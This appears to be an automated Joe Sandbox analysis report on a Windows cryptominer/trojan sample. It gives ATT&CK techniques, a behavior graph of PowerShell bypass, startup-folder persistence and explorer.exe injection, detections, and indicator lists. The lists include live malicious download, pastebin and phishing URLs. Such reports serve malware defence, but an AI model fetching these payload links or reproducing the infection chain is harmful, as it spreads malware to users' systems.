              Registry Run Keys / Startup Folder
              2
              Registry Run Keys / Startup Folder
              11
              Masquerading
              Security Account Manager111
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Exploitation for Client Execution
              Login HookLogin Hook131
              Virtualization/Sandbox Evasion
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture11
              Non-Standard Port
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts1
              Command and Scripting Interpreter
              Network Logon ScriptNetwork Logon Script911
              Process Injection
              LSA Secrets131
              Virtualization/Sandbox Evasion
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable Media3
              PowerShell
              RC ScriptsRC ScriptsSteganographyCached Domain Credentials1
              Application Window Discovery
              VNCGUI Input Capture13
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1630727 Sample: yjYJ8QncaF.exe Startdate: 06/03/2025 Architecture: WINDOWS Score: 100 105 pastebin.com 2->105 107 pool.hashvault.pro 2->107 109 7 other IPs or domains 2->109 133 Sigma detected: Xmrig 2->133 135 Suricata IDS alerts for network traffic 2->135 137 Malicious sample detected (through community Yara rule) 2->137 141 15 other signatures 2->141 15 yjYJ8QncaF.exe 8 2->15         started        18 explorer.exe 2->18         started        21 explorer.exe 2->21         started        24 2 other processes 2->24 signatures3 139 Connects to a pastebin service (likely for C&C) 105->139 process4 dnsIp5 101 C:\Users\user\AppData\Local\Temp\...\FB9B.bat, ASCII 15->101 dropped 26 cmd.exe 1 15->26         started        129 System process connects to network (likely due to code injection or exploit) 18->129 131 Query firmware table information (likely to detect VMs) 18->131 111 a-0003.a-msedge.net 204.79.197.203 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->111 29 WerFault.exe 21->29         started        113 127.0.0.1 unknown unknown 24->113 31 WerFault.exe 24->31         started        file6 signatures7 process8 signatures9 169 Suspicious powershell command line found 26->169 171 Wscript starts Powershell (via cmd or directly) 26->171 173 Bypasses PowerShell execution policy 26->173 33 powershell.exe 14 17 26->33         started        38 conhost.exe 26->38         started        process10 dnsIp11 103 45.144.212.77, 16000, 49733 HPC-MVM-ASHU Ukraine 33->103 89 C:\Users\user\AppData\Local\...\installer.ps1, ASCII 33->89 dropped 143 Drops VBS files to the startup folder 33->143 145 Compiles code for process injection (via .Net compiler) 33->145 40 powershell.exe 25 33->40         started        file12 signatures13 process14 file15 91 C:\Users\user\AppData\...\win_update.ps1, ASCII 40->91 dropped 93 C:\Users\user\AppData\...\win_update.bat, DOS 40->93 dropped 95 C:\Users\user\AppData\...\win_update.vbs, ASCII 40->95 dropped 97 C:\Users\user\AppData\...\zh5axkic.cmdline, Unicode 40->97 dropped 157 Injects code into the Windows Explorer (explorer.exe) 40->157 159 Writes to foreign memory regions 40->159 161 Creates a thread in another existing process (thread injection) 40->161 44 explorer.exe 28 2 40->44 injected 48 csc.exe 3 40->48         started        51 conhost.exe 40->51         started        signatures16 process17 dnsIp18 119 140.82.121.4 GITHUBUS United States 44->119 121 github.com 140.82.121.3 GITHUBUS United States 44->121 123 2 other IPs or domains 44->123 175 System process connects to network (likely due to code injection or exploit) 44->175 177 Writes to foreign memory regions 44->177 179 Allocates memory in foreign processes 44->179 181 3 other signatures 44->181 53 wscript.exe 1 44->53         started        56 notepad.exe 44->56         started        59 tasklist.exe 44->59         started        61 tasklist.exe 44->61         started        85 C:\Users\user\AppData\Local\...\zh5axkic.dll, PE32 48->85 dropped 63 cvtres.exe 1 48->63         started        file19 signatures20 process21 dnsIp22 147 Wscript starts Powershell (via cmd or directly) 53->147 149 Windows Scripting host queries suspicious COM object (likely to drop second stage) 53->149 151 Suspicious execution chain found 53->151 65 cmd.exe 1 53->65         started        115 192.248.189.11 AS-CHOOPAUS France 56->115 117 pool.hashvault.pro 80.240.16.67 AS-CHOOPAUS Germany 56->117 153 System process connects to network (likely due to code injection or exploit) 56->153 155 Query firmware table information (likely to detect VMs) 56->155 68 conhost.exe 59->68         started        70 conhost.exe 61->70         started        signatures23 process24 signatures25 125 Suspicious powershell command line found 65->125 127 Wscript starts Powershell (via cmd or directly) 65->127 72 powershell.exe 65->72         started        76 conhost.exe 65->76         started        78 timeout.exe 1 65->78         started        process26 file27 99 C:\Users\user\AppData\Local\...\tkaxwgf0.0.cs, Unicode 72->99 dropped 163 Injects code into the Windows Explorer (explorer.exe) 72->163 165 Writes to foreign memory regions 72->165 167 Creates a thread in another existing process (thread injection) 72->167 80 csc.exe 72->80         started        signatures28 process29 file30 87 C:\Users\user\AppData\Local\...\tkaxwgf0.dll, PE32 80->87 dropped 83 cvtres.exe 80->83         started        process31

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              yjYJ8QncaF.exe66%VirustotalBrowse
              yjYJ8QncaF.exe61%ReversingLabsWin64.Trojan.Amadey
              yjYJ8QncaF.exe100%AviraTR/AVI.Agent.gdbhv
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://45.144.210%Avira URL Cloudsafe
              http://45.144.212.77:160000%Avira URL Cloudsafe
              http://45.144.212.77/0%Avira URL Cloudsafe
              https://oneget.orgX0%Avira URL Cloudsafe
              http://45.144.212.0%Avira URL Cloudsafe
              https://oneget.org0%Avira URL Cloudsafe
              http://45.144.212.77:16000/setup0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              github.com
              140.82.121.3
              truefalse
                high
                a-0003.a-msedge.net
                204.79.197.203
                truefalse
                  high
                  pool.hashvault.pro
                  80.240.16.67
                  truefalse
                    high
                    objects.githubusercontent.com
                    185.199.111.133
                    truefalse
                      high
                      pastebin.com
                      172.67.19.24
                      truefalse
                        high
                        ax-0001.ax-msedge.net
                        150.171.27.10
                        truefalse
                          high
                          api.msn.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            http://45.144.212.77:16000/setuptrue
                            • Avira URL Cloud: safe
                            unknown
                            https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exefalse
                              high
                              https://pastebin.com/raw/i3kvksAWfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://45.144.212.77/powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://go.micropowershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://45.144.212.77:16000powershell.exe, 00000003.00000002.1820169013.000001D9A59C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contoso.com/powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://oneget.orgXpowershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://45.144.21powershell.exe, 00000003.00000002.1820169013.000001D9A5CC2000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://oneget.orgpowershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://45.144.212.powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        172.67.19.24
                                                        pastebin.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        80.240.16.67
                                                        pool.hashvault.proGermany
                                                        20473AS-CHOOPAUSfalse
                                                        140.82.121.3
                                                        github.comUnited States
                                                        36459GITHUBUSfalse
                                                        140.82.121.4
                                                        unknownUnited States
                                                        36459GITHUBUStrue
                                                        45.144.212.77
                                                        unknownUkraine
                                                        47169HPC-MVM-ASHUtrue
                                                        185.199.111.133
                                                        objects.githubusercontent.comNetherlands
                                                        54113FASTLYUSfalse
                                                        192.248.189.11
                                                        unknownFrance
                                                        20473AS-CHOOPAUStrue
                                                        204.79.197.203
                                                        a-0003.a-msedge.netUnited States
                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                        IP
                                                        127.0.0.1
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1630727
                                                        Start date and time:2025-03-06 08:08:15 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 9m 21s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:50
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:yjYJ8QncaF.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:5b3ed060facb9d57d8d0539084686870.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.expl.evad.mine.winEXE@41/42@8/9
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 25
                                                        • Number of non-executed functions: 39
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.149.20.212, 20.190.159.131, 13.107.246.60, 20.74.47.205, 20.105.99.58, 2.23.227.215, 20.223.35.26, 150.171.27.10
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.f.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                                        • Execution Graph export aborted for target powershell.exe, PID 7408 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        TimeTypeDescription
                                                        02:09:10API Interceptor99x Sleep call for process: powershell.exe modified
                                                        02:09:33API Interceptor363x Sleep call for process: explorer.exe modified
                                                        02:10:31API Interceptor2x Sleep call for process: svchost.exe modified
                                                        07:09:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        172.67.19.24rrats.exeGet hashmaliciousAsyncRATBrowse
                                                        • pastebin.com/raw/KKpnJShN
                                                        sys_upd.ps1Get hashmaliciousUnknownBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                        • pastebin.com/raw/sA04Mwk2
                                                        80.240.16.67mBBBgvD.exeGet hashmaliciousAsyncRAT, BitCoin Miner, XWorm, XmrigBrowse
                                                          Microsoft Visual C++ 2015-2019 Redistrid.exeGet hashmaliciousXmrigBrowse
                                                            r.exeGet hashmaliciousXmrigBrowse
                                                              SecuriteInfo.com.Win64.Evo-gen.10598.15505.exeGet hashmaliciousXmrigBrowse
                                                                bioldgefsawe.exeGet hashmaliciousXmrigBrowse
                                                                  461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exeGet hashmaliciousBlank Grabber, Njrat, XmrigBrowse
                                                                    lolz.exeGet hashmaliciousXmrigBrowse
                                                                      9d2h99wrj.exeGet hashmaliciousXmrigBrowse
                                                                        Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                          xmr new.exeGet hashmaliciousXmrigBrowse
                                                                            140.82.121.3Winscreen.exeGet hashmaliciousXmrigBrowse
                                                                            • github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/shell.exe
                                                                            stubInf.exeGet hashmaliciousXmrigBrowse
                                                                            • github.com/darkZeusWeb/loadersoft/raw/refs/heads/main/Winscreen.exe
                                                                            6glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                                                                            • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                                                                            firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                                                                            • github.com/john-xor/temp/blob/main/index.html?raw=true
                                                                            0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                                                                            • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                                                                            MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                                                                            • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            github.comd5Wai5fIAK.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                            • 140.82.121.4
                                                                            downloader.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.4
                                                                            https://codeload.github.com/SMSAgentSoftware/ConfigMgr-PXE-Boot-Log/zip/refs/heads/masterGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.10
                                                                            svchost.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.3
                                                                            Setup.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.4
                                                                            Setup.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.3
                                                                            tresk.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.112.3
                                                                            ConsoleApplication4.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.4
                                                                            @echo off.batGet hashmaliciousXWormBrowse
                                                                            • 140.82.121.3
                                                                            https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.pGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                            • 140.82.121.3
                                                                            pool.hashvault.promBBBgvD.exeGet hashmaliciousAsyncRAT, BitCoin Miner, XWorm, XmrigBrowse
                                                                            • 80.240.16.67
                                                                            Microsoft Visual C++ 2015-2019 Redistrid.exeGet hashmaliciousXmrigBrowse
                                                                            • 80.240.16.67
                                                                            SecuriteInfo.com.Win32.Backdoor.Rozena.62P92R.11698.31770.exeGet hashmaliciousXmrigBrowse
                                                                            • 80.240.16.67
                                                                            r.exeGet hashmaliciousXmrigBrowse
                                                                            • 192.248.189.11
                                                                            SecuriteInfo.com.Win64.Evo-gen.10598.15505.exeGet hashmaliciousXmrigBrowse
                                                                            • 80.240.16.67
                                                                            SecuriteInfo.com.FileRepMalware.18792.6243.exeGet hashmaliciousXmrigBrowse
                                                                            • 192.248.189.11
                                                                            bioldgefsawe.exeGet hashmaliciousXmrigBrowse
                                                                            • 80.240.16.67
                                                                            random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RedLine, Vidar, XWorm, XmrigBrowse
                                                                            • 192.248.189.11
                                                                            461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exeGet hashmaliciousBlank Grabber, Njrat, XmrigBrowse
                                                                            • 192.248.189.11
                                                                            NKtd6GRqI1.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                            • 80.240.16.67
                                                                            a-0003.a-msedge.netq3na5Mc.exeGet hashmaliciousVidarBrowse
                                                                            • 204.79.197.203
                                                                            09.msiGet hashmaliciousRedLineBrowse
                                                                            • 204.79.197.203
                                                                            95.msiGet hashmaliciousRedLineBrowse
                                                                            • 204.79.197.203
                                                                            ESVoO7ywn5.exeGet hashmaliciousVidarBrowse
                                                                            • 204.79.197.203
                                                                            prog.exeGet hashmaliciousAzorult, RamnitBrowse
                                                                            • 204.79.197.203
                                                                            bin2.exeGet hashmaliciousAZORult, RamnitBrowse
                                                                            • 204.79.197.203
                                                                            Gadomancy.exeGet hashmaliciousUnknownBrowse
                                                                            • 204.79.197.203
                                                                            SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exeGet hashmaliciousUnknownBrowse
                                                                            • 204.79.197.203
                                                                            SecuriteInfo.com.Trojan.Inject5.17530.4675.11921.exeGet hashmaliciousUnknownBrowse
                                                                            • 204.79.197.203
                                                                            xn3nGSFdRn.exeGet hashmaliciousVidarBrowse
                                                                            • 204.79.197.203
                                                                            objects.githubusercontent.comd5Wai5fIAK.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                            • 185.199.108.133
                                                                            svchost.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.110.133
                                                                            https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.pGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                            • 185.199.110.133
                                                                            FbgvXTTJlW.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.111.133
                                                                            random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                            • 185.199.110.133
                                                                            https://atpscan.global.hornetsecurity.com/?d=eqOz7AXSzN2V2mi6iPmcWAtgYiZy7lkNff2rdLiYxLc&f=uieQKeFt6Zo7ANK8iLoZFPTujO3kkK4boT32m0sSAem2yjB3nbrJPC-bjAvICoGvUsBPae9KnS3shx7u3k2FiwwIqyiK3sQzLKFz5y8q_nj8PAt_J9HmT1bo5p4OIPC1eZYzpGJBfTb7UM-l94hwhA&i=&k=WFad&m=2x6lr8WIArfjoki1cLDoaGvtZnic1YOh--dHqhZnxNrDJUG4m82-vM5qXqDCSAsURkVh0fd5KOJuBllo3N6JKs2ra2-P7_2temJ9tYhs2hxglgVJVr5gYlT_yoYeRZjF&n=GP4DG9iGvMhGp7Cc0MfzdFVrVHv5htxygQbtVpxMJpUIBpkiFZSL5KiAfQBsE-KAVBPk5S1ARYk-3VQUbSVQ7A&r=WVGLAKs8L0Zh9eoU1fbnSHa5iJ0XuA-IG_TRldcDEATEV5Ai8mKQZHV2Y3yODQ5K&s=49438b7fe2a6d5a79aafcc5ab0730c0b326ba1d8858947a63aac81e1e9547b97&u=https%3A%2F%2Faws.predictiveresponse.net%2Ffwdhs.htm%3Fredirect%3D%2F%2FmembersGelita.cpmeduca.com.brGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                            • 185.199.110.133
                                                                            random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Tofsee, Vidar, zgRATBrowse
                                                                            • 185.199.108.133
                                                                            https://github.com/ravendevteam/talon/releases/download/v1.1.3/talon.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.111.133
                                                                            microsoft-update.batGet hashmaliciousUnknownBrowse
                                                                            • 185.199.110.133
                                                                            https://github.com/Tautulli/Tautulli/releases/download/v2.15.1/Tautulli-windows-v2.15.1-x64.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSEHYt5mSeeM.exeGet hashmaliciousLummaC StealerBrowse
                                                                            • 188.114.96.3
                                                                            Kontrakt-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 104.21.112.1
                                                                            .deveba=.svgGet hashmaliciousHTMLPhisherBrowse
                                                                            • 104.21.112.1
                                                                            PI 00928292828.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                            • 104.21.112.1
                                                                            http://www.creditsafe.com/us/en.htmlGet hashmaliciousUnknownBrowse
                                                                            • 104.17.25.14
                                                                            1isequal9.i486.elfGet hashmaliciousUnknownBrowse
                                                                            • 198.41.197.97
                                                                            Latsco com_DocuSign_399333177498313234326931502391571054649119654915079225oZtxEvcddgRXCDTmTgDN.htmlGet hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            Real.zipGet hashmaliciousUnknownBrowse
                                                                            • 104.16.123.96
                                                                            Korea Customs Document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 172.67.74.152
                                                                            miri.hazan_Wednesday, March 05, 2025.pdfGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                            • 104.17.25.14
                                                                            AS-CHOOPAUScbr.arm.elfGet hashmaliciousMiraiBrowse
                                                                            • 204.80.129.89
                                                                            i686.elfGet hashmaliciousMiraiBrowse
                                                                            • 167.179.75.251
                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 141.164.52.211
                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                            • 209.222.21.115
                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                            • 209.222.21.115
                                                                            Setup.exeGet hashmaliciousUnknownBrowse
                                                                            • 209.222.21.115
                                                                            morte.mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 45.32.242.115
                                                                            morte.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                            • 44.175.72.203
                                                                            morte.ppc.elfGet hashmaliciousUnknownBrowse
                                                                            • 44.175.18.154
                                                                            yakov.sh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 44.174.57.194
                                                                            GITHUBUSd5Wai5fIAK.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                            • 140.82.121.4
                                                                            downloader.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.4
                                                                            https://codeload.github.com/SMSAgentSoftware/ConfigMgr-PXE-Boot-Log/zip/refs/heads/masterGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.10
                                                                            svchost.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.3
                                                                            Setup.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.4
                                                                            Setup.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.3
                                                                            tresk.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.112.3
                                                                            ConsoleApplication4.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.4
                                                                            @echo off.batGet hashmaliciousXWormBrowse
                                                                            • 140.82.121.3
                                                                            https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.pGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                            • 140.82.121.3
                                                                            GITHUBUSd5Wai5fIAK.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                            • 140.82.121.4
                                                                            downloader.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.4
                                                                            https://codeload.github.com/SMSAgentSoftware/ConfigMgr-PXE-Boot-Log/zip/refs/heads/masterGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.10
                                                                            svchost.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.121.3
                                                                            Setup.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.4
                                                                            Setup.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.3
                                                                            tresk.exeGet hashmaliciousUnknownBrowse
                                                                            • 140.82.112.3
                                                                            ConsoleApplication4.exeGet hashmaliciousAveMaria, Clipboard Hijacker, StormKittyBrowse
                                                                            • 140.82.121.4
                                                                            @echo off.batGet hashmaliciousXWormBrowse
                                                                            • 140.82.121.3
                                                                            https://docs.google.com/presentation/d/e/2PACX-1vSP5XcPJ2CxZRi_aMWj1ncI-XfY7WDBREj5DcuUNYZ0utEzQihTwp_09fWq2KETAmkKt8NC3E04vQkm/pub?start=false&loop=false&delayms=3000#slide=id.pGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                            • 140.82.121.3
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            37f463bf4616ecd445d4a1937da06e19Upd#U0430te.jsGet hashmaliciousUnknownBrowse
